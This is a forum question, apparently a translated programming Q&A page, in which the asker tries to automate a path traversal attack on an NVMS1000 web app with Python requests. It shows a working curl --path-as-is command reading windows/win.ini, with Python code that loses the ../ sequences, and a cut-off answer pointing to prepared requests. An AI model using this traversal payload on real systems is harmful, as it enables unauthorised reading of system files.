最近,我想通过python请求模块自动攻击一个容易受到路径遍历攻击(NVMS1000)的web应用程序
通过使用如下选项路径,请求与curl完美配合:
curl --path-as-is http://127.0.0.1/../../../../../../../../../../windows/win.ini
但是,当使用python请求模块时,“./”从urlpath中剥离出来(我可以清楚地看到,例如通过Burp套件):
host = "127.0.0.1"
path = "/../../../../../../../../../.."
file = "/windows/win.ini"
url = host+path+file
response = requests.get(url,proxies=proxies)
我检查了文档,但没有找到任何关于这种行为的解释,也没有找到与curl类似的防止剥离/规范化的选项
平台是debian,请求模块是版本2.22.0
谢谢你的帮助
或者更好的是,您应该使用prepared requests:
相关问题 更多 >
编程相关推荐